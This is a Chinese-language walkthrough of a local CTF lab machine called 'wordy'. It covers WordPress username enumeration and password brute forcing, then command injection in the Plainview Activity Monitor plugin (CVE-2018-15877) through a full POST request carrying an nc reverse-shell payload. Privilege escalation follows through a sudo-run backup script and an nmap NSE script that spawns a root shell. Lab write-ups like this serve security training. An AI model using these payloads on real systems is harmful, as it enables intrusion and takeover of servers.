好久没打渗透了,手段忘了不少,最近都在干嘛,自己也不知道,也不能说,哈哈!
是时候拿出练练手了
靶机IP:192.168.8.159
修改host:
192.168.8.159 wordy
nmap全扫
image.png
也是基本的常规渗透
web渗透
image.png
又是一个wordpress
常规操作
探测站点管理员用户名:
http://wordy/?author=n
n从1至5都能爆出用户名m,分别为:
1--admin
2--graham
3--mark
4--sarah
5--jens
在靶机官网处,作者给出了提示
image.png
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ;-)
生成字典
将上述爆出的五个用户名写入username字典中
根据提示生成相应的密码字典
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords
image.png
后台爆破
用burp爆破,爆了好久
image.png
得到一个登陆口令
mark helpdesk01
登陆后台
image.png
看来没什么权限
发现了这个 Activity管理插件,可以以admin身份监视后台登录情况
image.png
通过搜索发现该插件是存在着命令执行漏洞
image.png
远程攻击者可通过向
url“/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools”发送精心构造的“ip”参数来利用该漏洞。此漏洞的成功利用需要特权,但是存有该漏洞的插件版本也易受到CSRF攻击和基于反射的XSS攻击,结合三个漏洞,通过诱导管理员点击恶意链接最终可以导致远程命令执行。
受影响的版本
Plainview Activity Monitor plugin version <= 20161228
getshell
在kali中search一下该插件的poc
searchsploit activity
image.png
可以看到是CSRF漏洞
查看该poc,给出了poc的GitHub地址
https://github.com/aas-n/CVE/tree/master/CVE-2018-15877
经过测试,其实触发该漏洞的触发点在如下图所示
image.png
用burp抓取该POST数据包,写入nc反弹一句话
nc 192.168.8.253 4444 -e /bin/bash
POST /wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools HTTP/1.1
Host: wordy
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools
Content-Type: multipart/form-data; boundary=---------------------------10346177832391
Content-Length: 282
Cookie: wordpress_14014489b649086e51cacb340bafe656=mark%7C1559472991%7CKfa6geY3JShfhuvXYEyxMKtIN0nuZumOd09zbJRNRno%7Cd3e5f20d369d5422dea75189e0fea7cfa7a36e355171dd311ca9e7121ca81ddd; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_14014489b649086e51cacb340bafe656=mark%7C1559472991%7CKfa6geY3JShfhuvXYEyxMKtIN0nuZumOd09zbJRNRno%7C4554e1935c4a639ab756023d04f6e56c066d2a6f29b2bc10c9cb14acf2685045; wp-settings-3=mfold%3Do; wp-settings-time-3=1559300197
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------10346177832391
Content-Disposition: form-data; name="ip"
test | nc 192.168.8.253 4444 -e /bin/bash
-----------------------------10346177832391
Content-Disposition: form-data; name="lookup"
Lookup
-----------------------------10346177832391--
kali中开启nc监听
nc -lvp 4444
image.png
拿到shell
提权
image.png
看到系统版本这么新,应该没有什么漏洞
一通乱翻,发现home目录下的用户文件夹中,有个小tip
image.png
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
估计添加了一个账户
graham - GSo7isUM1D4
应该能登录
尝试登录ssh
登录ssh
ssh graham@wordy
image.png
登录成功
在home下发现了jens用户下有个sh脚本
image.png
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
jens用户反弹
哈哈,常规操作,可用来提权
sudo -l
查看下权限,发现jens用户可以执行该sh
image.png
在该sh脚本中写入nc 连接一句话连接kali
nc 192.168.8.253 9999 -e /bin/bash
然后再以jens用户的权限执行它
sudo -u jens /home/jens/backups.sh
反弹回kali的shell是jens用户的
image.png
get root
拿到jens用户的shell后,查看其权限
image.png
发现能以root用户免密码执行nmap
可以借此提权
查看其它大牛的提示,写个nmap的脚本,root权限执行,进行提权
echo 'os.execute("/bin/sh")' > root.nse
将其保存为.nse格式,如下图
image.png
之后sudo执行该nmap脚本,
sudo nmap --script=/home/jens/root.nse
image.png
get root 成功
get flag
image.png
总结
最近也在备考啦!
然后该靶机就是一个常规的CTF
1、wordpress后台爆破。登录后台,没有写shell的权限
2、找到相关的插件漏洞,拿shell
3、进入ssh,对可执行的文件、脚本特别注意,可以进行提权
靶机百度云下载
链接:https://pan.baidu.com/s/1WiZOiau6EGu6MtEHSRRCog
提取码:kqfk
网友评论